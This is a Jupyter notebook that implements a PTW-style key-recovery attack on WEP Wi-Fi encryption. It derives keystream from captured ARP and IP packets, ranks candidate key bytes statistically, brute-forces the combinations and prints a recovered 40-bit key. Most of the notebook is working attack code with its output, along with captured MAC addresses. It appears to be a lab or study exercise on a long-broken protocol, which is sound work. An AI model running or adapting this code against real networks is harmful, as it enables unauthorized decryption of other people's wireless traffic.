In [1]:
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from tqdm import tqdm
import helper
import itertools
import collections
import copy
import time
from textwrap import wrap

In [2]:
def generateRanking(tuples, hundredAndFour = False):
    """generate votes for the values of each byte
    
    Args:
        tuples: tuples containing IV and first few bytes of key stream
        hundredAndFour: for 104 bit keys (experimental only)

    Returns:
        reuslts: a dictionary of lists denoting voting for each byte

    """
    #104 bit keys, experimentation only
    if(hundredAndFour):
        keyPositions = [0,1,2,3,4,5,6,7,8,9,10,11,12]
    else:
        keyPositions = [0,1,2,3,4]
    results = {k:[] for k in keyPositions}
    
    iv0ID = len(tuples[0])-1
    iv1ID = len(tuples[0])-2
    iv2ID = len(tuples[0])-3
    for i in keyPositions:
        for tple in tqdm(tuples):
            #S box generation
            S = [i for i in range(0, 256)]
            
            #first 3 bytes of key is the IV sent in the clear
            key = [tple[iv0ID], tple[iv1ID], tple[iv2ID]]
            
            #generate key list to put into KSA
            key_list = helper.rc4KeyPrep(key, S)
            
            #run partial KSA
            sThrow, Ss, Js = helper.KSA(S, key_list, 4)
            
            #calculation Rk[i] approximation
            idx = (3+i-helper.hex2int(tple[2+i]))%256
            a = Ss[3].index(idx)
            b = 0
            for xx in range(3, 3+i+1):
                b = b + Ss[3][xx]
            summ = (a-(Js[3]+b))%256
            results[i].append(summ)
    return results

def getTopRanking(results, bruteForceFactor):
    """generate top x ranking for each byte
    
    Args:
        results: from generateRanking
        bruteForceFactor: depth of rankings to brute force

    Returns:
        resultsRanking: a list of pandas dataframes denoting ranking for each byte

    """
    resultsRanking = []
    for k in results.keys():
        resultsRanking.append(pd.DataFrame(results[k], columns = ['x'])['x'].value_counts().reset_index()['index'].tolist()[:bruteForceFactor])
    return resultsRanking

def tryPermutations(perms, iv0, iv1, iv2, cipherText):
    """try permutations until one of them is correct
    
    Args:
        perms: possible permutations to try
        iv0: first byte of iv of cipherText
        iv1: second byte of iv of cipherText
        iv2: third byte of iv of cipherText
        cipherText: sample cipherText

    Returns:
        key: correct key, or None if not found

    """
    for key in tqdm(perms):
        synthesizedKey = [iv0,iv1,iv2]+list(key)
        plainText = [170,170,3,0,0,0,8,]#6,0,1,8,0,6,4]
        keyStream = helper.rc4(synthesizedKey)[:len(plainText)]
        testCipherText = helper.intArray2HexString([x^y for x,y in zip(keyStream,plainText)])
        #print(testCipherText)
        #print(cipherText)
        if(testCipherText == cipherText):
            return key

def generatePermsIntermediate(resultsRanking):
    """helper function for generatePerms
    
    Args:
        resultsRanking: from getTopRanking

    Returns:
        perms: to generatePerms

    """
    perms = [list(perm) for perm in list(itertools.product(*resultsRanking))]
    for i in range(len(perms)):
        worker = perms[i]
        for j in list(reversed(list(range(1,5)))):
            worker[j] = (worker[j]-worker[j-1])%256
        perms[i] = worker
    return perms
def generatePerms(resultsRanking, bruteForce = []):
    """generate possible permutations to brute force
    
    Args:
        resultsRanking: from getTopRanking
        bruteForce: which byte to brute force, if any

    Returns:
        ret: list of possible permutations

    """
    ret = []
    resultsRankingOriginal = copy.deepcopy(resultsRanking)
    if(len(bruteForce)>0):
        for b in bruteForce:
            resultsRanking = copy.deepcopy(resultsRankingOriginal)
            #brute force only the selected byte in this case, the rest leave them as they are
            resultsRanking[b] = [i for i in range(0,256)]
            perms = generatePermsIntermediate(resultsRanking)
            ret = ret + perms
    else:
        ret = generatePermsIntermediate(resultsRanking)
    #remove duplicates
    ret = [ list(x) for x in set(tuple(x) for x in ret) ]
    ret.sort(key = lambda x: x[1] )
    return ret

In [3]:
#read in file
df = pd.concat([pd.read_csv('WEPcrack-05.csv')])

In [4]:
#plainText strings for IPV4 and ARP data
ptStringArp = 'aaaa0300000008060001'
ptStringData = 'aaaa0300000008004500'

#drop duplicate data strings
arpBroadcastsUnique = df.drop_duplicates(subset=['data'])

#get data length
arpBroadcastsUnique['dataLength'] = arpBroadcastsUnique['data'].str.len()

#filtering (using all packets)
arpBroadcastsUnique = arpBroadcastsUnique[arpBroadcastsUnique['dataLength']>1]

#plaintext assignment
arpBroadcastsUnique['plainText'] = np.where(arpBroadcastsUnique['dataLength']<75, ptStringArp, ptStringData)

#get ciphertext
arpBroadcastsUnique['cipherText'] = arpBroadcastsUnique['data'].str[:len(ptStringArp)]

#XOR plaintext and ciphertext to get keystream
arpBroadcastsUnique['keyStream'] = arpBroadcastsUnique[['cipherText', 'plainText']].apply(helper.xorHexStringPandas, axis=1)
arpBroadcastsUnique = arpBroadcastsUnique.reset_index()
arpBroadcastsUnique

#get key stream bytes
keyStreamBytes = pd.DataFrame(arpBroadcastsUnique['keyStream'].apply(lambda x: wrap(x,2)).tolist())
arpBroadcastsUnique = arpBroadcastsUnique.join(keyStreamBytes, rsuffix='ks')
arpBroadcastsUnique = arpBroadcastsUnique.drop(arpBroadcastsUnique.columns[[1]],axis=1)

#get unique IVs
arpBroadcastsUnique = arpBroadcastsUnique.dropna()
arpBroadcastsUnique = arpBroadcastsUnique.drop_duplicates(subset=['iv0','iv1','iv2'], keep='last')
arpBroadcastsUnique

<ipython-input-4-b84a5bcf5396>:9: SettingWithCopyWarning: 
A value is trying to be set on a copy of a slice from a DataFrame.
Try using .loc[row_indexer,col_indexer] = value instead

See the caveats in the documentation: https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy
  arpBroadcastsUnique['dataLength'] = arpBroadcastsUnique['data'].str.len()


,index,iv0,iv1,iv2,bssid,ra,da,ta,sa,staa,...,0,1,2,3,4,5,6,7,8,9
1,1,205,11,232,3c:84:6a:88:ac:9c,3c:84:6a:88:ac:9c,3c:84:6a:88:ac:9c,3c:84:6a:88:ac:9c,34:29:12:5f:25:5b,34:29:12:5f:25:5b,...,73,8a,39,60,1b,c8,3c,00,80,a7
5,5,246,95,246,3c:84:6a:88:ac:9c,3c:84:6a:88:ac:9c,01:00:5e:7f:ff:fa,01:00:5e:7f:ff:fa,8a:52:50:97:f0:ce,8a:52:50:97:f0:ce,...,9f,72,63,81,d0,fd,23,73,53,b0
8,8,119,14,119,3c:84:6a:88:ac:9c,3c:84:6a:88:ac:9c,01:00:5e:7f:ff:fa,01:00:5e:7f:ff:fa,8a:52:50:97:f0:ce,8a:52:50:97:f0:ce,...,a1,f4,2c,ff,a6,66,6f,82,6f,ac
12,12,209,172,209,3c:84:6a:88:ac:9c,34:29:12:5f:25:5b,34:29:12:5f:25:5b,34:29:12:5f:25:5b,3c:84:6a:88:ac:9c,34:29:12:5f:25:5b,...,b8,45,e1,ea,d3,6b,d9,c2,5a,b5
19,19,42,44,42,3c:84:6a:88:ac:9c,34:29:12:5f:25:5b,34:29:12:5f:25:5b,34:29:12:5f:25:5b,3c:84:6a:88:ac:9c,34:29:12:5f:25:5b,...,66,8c,bf,54,ee,d3,08,06,9d,b
...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...
29217,77139,212,41,212,3c:84:6a:88:ac:9c,ff:ff:ff:ff:ff:ff,ff:ff:ff:ff:ff:ff,ff:ff:ff:ff:ff:ff,8a:52:50:97:f0:ce,ff:ff:ff:ff:ff:ff,...,18,7d,f4,73,b0,02,4a,2a,54,3b
29218,77144,92,57,92,3c:84:6a:88:ac:9c,34:29:12:5f:25:5b,34:29:12:5f:25:5b,34:29:12:5f:25:5b,3c:84:6a:88:ac:9c,34:29:12:5f:25:5b,...,1e,88,df,0c,17,2a,88,1c,71,d6
29219,77145,171,27,171,3c:84:6a:88:ac:9c,ff:ff:ff:ff:ff:ff,ff:ff:ff:ff:ff:ff,ff:ff:ff:ff:ff:ff,8a:52:50:97:f0:ce,ff:ff:ff:ff:ff:ff,...,ea,82,34,d7,af,0f,f3,1b,57,f3
29220,77146,238,50,238,3c:84:6a:88:ac:9c,34:29:12:5f:25:5b,34:29:12:5f:25:5b,34:29:12:5f:25:5b,3c:84:6a:88:ac:9c,34:29:12:5f:25:5b,...,91,7c,6a,a0,4f,63,1f,34,cd,eb


In [5]:
#generate rankings for each byte (PTW attack)
dfToProcess = arpBroadcastsUnique[[0,1,2,3,4,5,6,7,8,9,'iv0', 'iv1', 'iv2']]
tuples = [tuple(x) for x in dfToProcess.to_numpy()]
results = generateRanking(tuples, False)

100%|█████████████████████████████████████████████████████████████████████████████████████████| 18763/18763 [00:02<00:00, 7985.98it/s]


In [6]:
#get top rankings based on brute force factor
resultsRanking = getTopRanking(results, 2)

#generate permutations based on rankings above
perms = generatePerms(resultsRanking, [0,1,2,3,4])
print(str(len(perms)) + ' guesses')

#get a sample to check against
sample = df.sample()
iv0 = sample['iv0'].iloc[0]
iv1 = sample['iv1'].iloc[0]
iv2 = sample['iv2'].iloc[0]
cipherText = sample['data'].str[:14].iloc[0]

key = tryPermutations(perms, iv0, iv1, iv2, cipherText)
if key is not None:
    print('key: ' + str(key))
    print('key (hex): ' + helper.intArray2HexString(key))
else:
    print('key not found')

  1%|█▏                                                                                         | 271/20352 [00:00<00:07, 2689.61it/s]

20352 guesses


 94%|████████████████████████████████████████████████████████████████████████████████████     | 19217/20352 [00:07<00:00, 2714.21it/s]

key: [254, 220, 186, 9, 135]
key (hex): fedcba0987


In [7]:
#for debugging: check which key was correct, of all the keys tested
correct = tryPermutations([[254,220,186,9,135],[1,2,3,254,220], helper.hexString2IntArray('5b5fe58a81'), helper.hexString2IntArray('078a3b85c437d0a36ae1162572'), helper.hexString2IntArray('6de46a5496720e8e16b3cec5f3'), helper.hexString2IntArray('1122334455'), helper.hexString2IntArray('6677889900')], iv0, iv1, iv2, cipherText)
correctSum = [correct[0]]
for i in range(0,len(correct)-1):
    correctSum.append((correctSum[i]+correct[i+1])%256)
print(correct)
print(correctSum)

  0%|                                                                                                           | 0/7 [00:00<?, ?it/s]

[254, 220, 186, 9, 135]
[254, 218, 148, 157, 36]


In [8]:
#for debugging: observe top 25 rankings of each byte
resultsRanking = []
for k in results.keys():
    print(pd.DataFrame(results[k], columns = ['x'])['x'].value_counts().reset_index()[:25])

    index   x
0      61  92
1     188  92
2     136  92
3     167  91
4     174  91
5      72  91
6     248  90
7     163  90
8      53  90
9     181  89
10     74  89
11    119  89
12    130  87
13    236  87
14     83  87
15    186  87
16    215  86
17    216  86
18     47  86
19    150  86
20    125  86
21    211  85
22    213  85
23    243  85
24    229  85
    index    x
0     218  126
1     224   98
2     119   93
3     220   93
4      85   92
5      28   91
6     169   89
7     210   89
8     100   89
9     233   88
10     51   87
11    211   86
12     71   86
13     56   86
14    163   86
15    141   85
16    239   85
17      2   85
18      9   84
19    194   84
20      7   84
21    130   84
22     54   84
23     12   84
24    168   83
    index    x
0     148  102
1     239   96
2     155   96
3      84   95
4     128   93
5     162   93
6      68   91
7     201   91
8     113   91
9      74   90
10     92   89
11    192   89
12     78   88
13    159   88
14    110   88
15    

In [9]:
#for debugging: to test strong keys
testKey = correct#[0,252,0,0,0]
def checkStrongKey(key):
    strongBytes = []
    for i in [1,2,3,4]:
        for l in range(1,i+1):
            for k in range(l,i+1):
                if((key[k]+3+k)%256 == 0):
                    strongBytes.append(k)
    return list(set(strongBytes))

checkStrongKey(testKey)

[]